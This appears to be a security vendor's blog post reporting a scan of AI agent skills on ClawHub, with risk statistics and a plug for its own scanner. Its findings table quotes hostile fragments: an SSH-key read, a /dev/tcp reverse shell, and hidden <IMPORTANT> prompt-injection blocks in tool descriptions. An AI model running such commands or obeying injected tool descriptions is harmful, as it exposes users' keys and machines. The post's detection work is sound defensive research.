We Scanned 36,394 AI Agent Skills. 13.5% Have Security Risks.
The first full ecosystem scan of ClawHub is complete. 36,394 skills crawled, 9,676 with parseable content. 182 CRITICAL, 1,124 HIGH. 249 packages combine shell access, network calls, and filesystem operations. Here is everything we found.
The Numbers
We crawled every publicly listed skill on ClawHub -- 36,394 packages total. Of those, 9,676 had parseable source content (README, SKILL.md, or tool definitions). We ran all 71 ATR detection rules against every one of them. The scan took 14 hours on a single machine.
Results: 182 packages flagged CRITICAL. 1,124 flagged HIGH. 1,016 MEDIUM. 7,354 LOW. That means 13.5% of all packages with content triggered at least one risk pattern above LOW severity. The remaining 86.5% passed clean.
The Triple Threat: 249 Packages
We define a "triple threat" package as one that combines three capability categories: shell execution (subprocess, exec, spawn), network access (fetch, HTTP, WebSocket), and filesystem operations (readFile, writeFile, unlink). Any one of these is normal. All three together in a single skill is a red flag -- it means the skill can read your files, run commands, and send data to an external server. That is the exact attack chain for credential theft.
Of 9,676 packages scanned, 249 (2.6%) exhibited this triple threat pattern. Not all are malicious -- some are legitimate build tools or deployment helpers. But every single one deserves manual review before installation.
Supply Chain: 122 Packages with postinstall Scripts
postinstall scripts run automatically when you `npm install` a package. They execute before you ever import the module. This is the same vector used in the ua-parser-js incident (CVE-2021-43616) and the event-stream attack (CVE-2018-16492). We found 122 packages (1.3% of scanned) with postinstall hooks. Of those, 18 had obfuscated or minified script content that resisted static analysis. These are the highest-priority packages for manual audit.
What the CRITICAL Findings Look Like
The 182 CRITICAL-severity packages broke down into these categories: | Pattern | Count | Example | |---------|-------|---------| | Credential harvesting (SSH keys, AWS creds, .env files) | 47 | `cat ~/.ssh/id_rsa` in tool handler | | Reverse shell / remote code execution | 31 | `bash -i >& /dev/tcp/...` | | Prompt injection in tool descriptions | 58 | Hidden `<IMPORTANT>` blocks overriding user intent | | Data exfiltration via encoded channels | 22 | Base64-encoded POST to external endpoints | | Typosquatting of popular packages | 24 | `cloude-code`, `claud-mcp`, `opencraw` |
What This Means for the Ecosystem
The MCP ecosystem is roughly where npm was in 2015 -- fast growth, minimal vetting, and a trust model that assumes good faith. The difference is that MCP skills run with your full user permissions by default. There is no sandbox, no permission prompt, and no app store review. Every install is `npm install` plus `sudo`.
We are publishing the full dataset at `data/clawhub-scan/ecosystem-report.csv` in the ATR repository. Every flagged package includes the specific ATR rule that triggered, the severity, and the exact line number. We encourage maintainers of flagged packages to review findings and submit corrections.
What You Can Do Right Now
Install PanGuard and scan your local skills: ```bash npm install -g @panguard-ai/panguard pga scan ``` This runs all 71 ATR rules against your installed skills and gives you a per-skill risk report. It takes about 60 seconds. The scan results feed into Threat Cloud, so every scan makes the detection network stronger for everyone.
We will continue scanning ClawHub weekly. The next report will include diff analysis -- new packages, removed packages, and packages whose risk profile changed between scans.